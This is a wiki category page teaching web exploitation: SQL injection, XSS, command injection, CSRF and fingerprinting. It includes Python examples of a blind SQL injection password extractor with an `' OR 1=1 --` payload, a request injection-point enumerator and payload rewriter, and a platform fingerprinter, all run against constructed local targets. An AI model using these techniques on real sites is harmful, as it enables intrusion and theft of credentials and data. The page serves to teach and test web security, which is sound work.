Category:Web exploitation
Web exploitation is attacking and taking advantage of a vulnerability in a computer system through a web application. There are numerous ways to exploit vulnerabilities, so only some of the basics will be covered here. The topics and tools covered in this series can be dangerous enough to compromise an HTTP server's database or code, or to give an attacker a remote shell.
Many web sites run web applications to serve dynamic content. Usually this means an SQL database backend of some sort and a web application (forums, talkboards, content management systems, blogs) that interfaces with that database. The affected languages are therefore anything that can be used as an interface over HTTP to dynamic content.
Penetration testing a web site is different from penetration testing a network, and different again from penetration testing a server. It is worth pointing out, though, that compromising one of these layers can lead to the others being compromised later: a shell obtained through the web application is a foothold on the server, and the server is a foothold on the network. Web application vulnerabilities are currently among the most prominent vulnerabilities exploited by cybercriminals.
It is a crime to use the techniques or tools on this page against any system without written authorization, unless the system in question belongs to you.
Special thanks to hatter for his contributions to this article.
Affected Languages
- PHP
- Perl
- CFM
- ASP
- Ruby
- Python
- Any language exposed through a CGI interface may also be vulnerable to web exploitation.
Types of Exploitation
- Vanguard can be used to test for many of these vulnerabilities.
- XSS can be used to capture logins and sessions, or to redirect the page, if a user clicks a malicious link or visits a page where the payload is stored.
- SQL injection can be used to copy, modify, or delete the affected application's database; in some cases it can create a remote shell on the affected system, and sometimes it allows an attacker to backdoor a web application.
- File inclusion vulnerabilities can be exploited to create a remote shell, which can lead to database manipulation and file tampering.
- Command injection effectively hands a remote shell to an attacker through arbitrary shell (bash or cmd.exe) command execution.
- CSRF allows an attacker to perform actions as any unsuspecting user who clicks a link or loads a page on a separate domain from the affected site while logged into the affected site.
- XSCF sends different data to different hosts. This way, if a piece of malware is able to recognize the source machine as something analyzing it, the malware can return something innocent while normal users are directed to something malicious.
- XSRF, as the term is used on this wiki, is using XSS to produce a same-domain URL that will perform actions as the logged-in user via a CSRF attack. Elsewhere XSRF is simply another name for CSRF, so check which meaning a source intends.
- Mass assignment abuse can allow an attacker to directly overwrite database values, by supplying extra request parameters that the framework binds to model fields it never meant to expose, without having to write any SQL queries and without the use of SQL injection.
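The SQL injection bullet above is the one most worth seeing end to end. The following is an added example written for this page (not code from the wiki's own tools): a hypothetical login check that concatenates a request parameter into SQL, the same check with a bound parameter, and a boolean-based blind extraction that recovers a column of the admin row one character at a time through nothing but "user exists / does not exist" answers. The database, table, users and passwords are constructed for the example; SQLite stands in for the MySQL backend the page describes.

```python
import sqlite3

# Constructed in-memory database standing in for a web application's backend;
# the "password" column is the secret the blind extraction recovers.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cr3t!"), ("bob", "hunter2")])
    conn.commit()
    return conn

DB = build_db()
QUERY_LOG = []   # every query the "application" executes, so the cost of an attack is visible

def user_exists_vulnerable(username):
    """Hypothetical check that pastes a request parameter straight into SQL."""
    query = "SELECT id FROM users WHERE username = '%s'" % username
    QUERY_LOG.append(query)
    return DB.execute(query).fetchone() is not None

def user_exists_safe(username):
    """Same check with a bound parameter: quotes in the input are data, not SQL."""
    query = "SELECT id FROM users WHERE username = ?"
    QUERY_LOG.append(query)
    return DB.execute(query, (username,)).fetchone() is not None

def oracle(condition):
    """One boolean probe: the page says 'user exists' only when condition holds for admin's row."""
    return user_exists_vulnerable("admin' AND (" + condition + ") --")

def binary_search(greater_than, lo, hi):
    """Find v in [lo, hi] given an oracle that answers 'is v > x?'; ceil(log2(hi-lo+1)) probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def blind_extract(column, max_len=64):
    """Recover a column of admin's row one character at a time through the yes/no oracle."""
    length = binary_search(lambda x: oracle("length(%s) > %d" % (column, x)), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # unicode(substr(...)) turns the character into its code point, so the search is numeric
        code = binary_search(lambda x, p=pos: oracle("unicode(substr(%s, %d, 1)) > %d" % (column, p, x)),
                             0, 127)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    print(user_exists_vulnerable("admin' OR 1=1 --"))   # the injected OR matches every row
    print(user_exists_safe("admin' OR 1=1 --"))         # no user is literally named that
    before = len(QUERY_LOG)
    print(blind_extract("password"), "recovered in", len(QUERY_LOG) - before, "requests")
```

Each character costs about seven requests because the search is by code point rather than by trying every character; the same binary search works against a timing oracle (`SLEEP`/`BENCHMARK` on MySQL) when the page gives no visible difference. The safe variant is immune not because it filters quotes but because the driver never interprets the parameter as SQL at all.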
Attack Vectors
- HTTP GET request parameters (Variables in the URL)
Rewritten or "clean" URLs can have GET parameters too, and the path segments themselves (an id or a slug in the URL) are input just like a query string. HTTP HEAD requests can also exploit poor input sanitizing in these parameters.
- HTTP POST request parameters (Fields and fieldsets in web forms)
You can send POST parameters to a URL that has GET parameters too, so both sets are in play on one request.
- HTTP Header parameters (Variables passed by header information)
This includes cookies, the User-Agent, the Referer, connection type and more. Anything the client sends is attacker-controlled; only the server's own headers can be trusted.
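To make the three vectors concrete, here is an added example (written for this page, not part of Vanguard or any other tool listed here) that enumerates every attacker-controlled value in a raw HTTP request, including path segments of a "clean" URL, the query string on a POST, form fields, individual cookies and the remaining headers, and then rebuilds the request with one of those points replaced by a payload, the way a scanner iterates over injection points. The request below is constructed, not captured from any real site.

```python
from urllib.parse import urlsplit, parse_qsl, urlencode, quote, unquote

# Constructed request (not captured from a real site): a "clean" URL with a
# path parameter (42), a query parameter, a form body, cookies and headers.
SAMPLE_REQUEST = (
    "POST /blog/posts/42/comments?sort=asc HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 29\r\n"
    "\r\n"
    "author=alice&body=hello+there"
)

# Headers handled separately (Cookie) or that describe the request rather than carry input.
SKIP_HEADERS = ("host", "content-length", "content-type", "cookie")

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, version, headers, body

def _cookies(value):
    pairs = []
    for item in value.split(";"):
        name, _, val = item.strip().partition("=")
        if name:
            pairs.append((name, val))
    return pairs

def injection_points(raw):
    """Every attacker-controlled value in the request as (vector, name, value)."""
    _, target, _, headers, body = parse_request(raw)
    parts = urlsplit(target)
    points = []
    for i, seg in enumerate(parts.path.split("/")[1:]):      # rewritten URL: each segment is input
        points.append(("path", str(i), unquote(seg)))
    for k, v in parse_qsl(parts.query, keep_blank_values=True):   # GET parameters, even on a POST
        points.append(("query", k, v))
    hdrs = dict((k.lower(), v) for k, v in headers)
    if hdrs.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for k, v in parse_qsl(body, keep_blank_values=True):      # POST form fields
            points.append(("body", k, v))
    for k, v in headers:
        if k.lower() == "cookie":
            points.extend(("cookie", name, val) for name, val in _cookies(v))
        elif k.lower() not in SKIP_HEADERS:
            points.append(("header", k, v))
    return points

def with_payload(raw, point, payload):
    """Rebuild the request with one injection point replaced by payload."""
    vector, name, _ = point
    method, target, version, headers, body = parse_request(raw)
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    if vector == "path":
        segs = path.split("/")
        segs[int(name) + 1] = quote(payload, safe="")
        path = "/".join(segs)
    elif vector == "query":
        query = urlencode([(k, payload if k == name else v)
                           for k, v in parse_qsl(query, keep_blank_values=True)])
    elif vector == "body":
        body = urlencode([(k, payload if k == name else v)
                          for k, v in parse_qsl(body, keep_blank_values=True)])
    elif vector == "cookie":
        headers = [(k, "; ".join("%s=%s" % (n, payload if n == name else val) for n, val in _cookies(v))
                    if k.lower() == "cookie" else v) for k, v in headers]
    elif vector == "header":
        headers = [(k, payload if k == name else v) for k, v in headers]
    # the body may have changed length, so Content-Length is recomputed
    headers = [(k, str(len(body.encode())) if k.lower() == "content-length" else v) for k, v in headers]
    target = path + ("?" + query if query else "")
    head = "\r\n".join(["%s %s %s" % (method, target, version)] + ["%s: %s" % h for h in headers])
    return head + "\r\n\r\n" + body

if __name__ == "__main__":
    for point in injection_points(SAMPLE_REQUEST):
        print(point)
    print(with_payload(SAMPLE_REQUEST, ("cookie", "session", "abc123"), "' OR 1=1 --"))
```

The point of the enumeration is the list it produces: nine inputs for one innocuous-looking request, and a filter that only sanitizes `sort` and the form fields leaves the path id, the cookies and the User-Agent untouched. A payload containing `;` or a newline would need extra care in the cookie and header vectors; that is header injection territory and is left out here.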
Fingerprinting
Because web vulnerability identification often requires that you identify the platform behind a particular web configuration, fingerprinting is commonly used to gather information about commonly used platforms and to recognize them from characteristics they share across installations.
These might include common headers, footers, comments in the page source, a version string in a generator tag, or simply the existence of a very particular page. Fingerprinting is a key step in determining which vulnerabilities apply to a specific software package and version, and it can also be used in conjunction with a search engine to get large lists of candidate hosts by searching for a single commonality.
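An added example of the matching logic such a fingerprinting engine runs (written for this page; it is not Kolkata's code, and the signatures below are illustrative, not a copy of any tool's database): each signature lists header patterns, body patterns and paths to probe, in the shape a yml configuration would load into, and the engine reports the evidence and any captured version string per platform. The target site is a constructed set of canned responses keyed by path, standing in for live HTTP fetches.

```python
import re

# Hypothetical signature set in the shape a yml config would load into. Patterns with a
# capture group also yield a version string. Header names are matched case-insensitively.
SIGNATURES = [
    {"name": "WordPress",
     "body": [r'<meta name="generator" content="WordPress ([\d.]+)"'],
     "paths": ["/wp-login.php", "/xmlrpc.php"]},
    {"name": "PHP",
     "headers": {"x-powered-by": r"PHP/([\d.]+)"}},
    {"name": "ColdFusion",
     "headers": {"set-cookie": r"CFID=|CFTOKEN="},
     "paths": ["/CFIDE/administrator/"]},
    {"name": "Apache",
     "headers": {"server": r"Apache(?:/([\d.]+))?"}},
]

# Constructed target: canned responses keyed by path, standing in for live HTTP fetches.
SAMPLE_SITE = {
    "/": {"status": 200,
          "headers": {"Server": "Apache/2.4.29 (Ubuntu)", "X-Powered-By": "PHP/7.2.10"},
          "body": '<html><head><meta name="generator" content="WordPress 4.9.8" />'
                  '</head><body><!-- theme: twentyseventeen --></body></html>'},
    "/wp-login.php": {"status": 200, "headers": {}, "body": '<form id="loginform">'},
    "/xmlrpc.php": {"status": 405, "headers": {}, "body": ""},
}

def fetch(site, path):
    """Stand-in for an HTTP GET: unknown paths return a 404 with no headers or body."""
    resp = site.get(path, {"status": 404, "headers": {}, "body": ""})
    return {"status": resp["status"],
            "headers": {k.lower(): v for k, v in resp["headers"].items()},
            "body": resp["body"]}

def _version(match):
    return match.group(1) if match.groups() and match.group(1) else None

def fingerprint(site):
    """Match every signature against the root page, probe its paths, and return evidence per platform."""
    root = fetch(site, "/")
    results = {}
    for sig in SIGNATURES:
        evidence, version = [], None
        for header, pattern in sig.get("headers", {}).items():
            value = root["headers"].get(header)
            m = re.search(pattern, value) if value is not None else None
            if m:
                evidence.append("header %s: %s" % (header, value))
                version = version or _version(m)
        for pattern in sig.get("body", []):
            m = re.search(pattern, root["body"])
            if m:
                evidence.append("body matches %r" % pattern)
                version = version or _version(m)
        for path in sig.get("paths", []):
            status = fetch(site, path)["status"]
            if status != 404:          # 200, 403 or 405 all confirm the path is handled
                evidence.append("%s responds %d" % (path, status))
        if evidence:
            results[sig["name"]] = {"version": version, "evidence": evidence}
    return results

if __name__ == "__main__":
    for name, hit in fingerprint(SAMPLE_SITE).items():
        print(name, hit["version"], hit["evidence"])
```

Two caveats a real engine has to deal with and this one does not: sites that return a 200 page for every path (soft 404s) defeat the existence check unless you compare the response to a deliberately bogus path first, and header values such as `Server` and `X-Powered-By` are trivially spoofable, so a version taken from them is a lead to confirm, not a conclusion.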
Web Exploitation Tools
In House
- Kolkata - Web application fingerprinting engine based on static file analysis, with yml-based configuration
- Vanguard - Web application vulnerability testing and exploitation framework
- Lfi_autopwn.pl - A file inclusion based exploit utility that emulates a remote shell
- MySql 5 Enumeration - A proof of concept for boolean enumeration through SQL injection from the command line
- GScrape - Google dork testing engine
Third party:
Pages in category "Web exploitation"
The following 100 pages are in this category, out of 100 total.
C
- Cause of sql injection
- Coldfusion admin subvert outgoing firewall
- Coldfusion admin to command execution
- Coldfusion administrator authentication bypass
- Coldfusion cfexecute sandbox bypass
- Coldfusion datasource password decryption
- Coldfusion remote authentication credentials disclosure
- Command Injection
- Command injection exploit
- Command injection on unix
- Command injection vulnerability
- Command injection with perl
- Configuring vanguard modules
- Content forgery
- Cookie attacks
- CSRF
S
- SQL injection
- Sql injection byte extraction
- Sql injection cheat sheets
- Sql injection filter evading version fingerprint
- Sql injection information schema
- Sql injection precomputation
- Sql injection script
- Sql injection test cheat sheet
- Sql injection time based byte extraction
- Sql injection timing attack with boolean enumeration
- Sql injection with regular expressions
- Sql injection without commas
- Sql injection without quotes
- Sql injection without tags
- Sql injection without whitespace
- SQL injection/Blind/Comparative precomputation
- SQL injection/mysqli-blindutils
- SQL injection/mysqli-blindutils/sqli-p.pl
- Sqli
- Steal cookies
- Stealing cookies through xss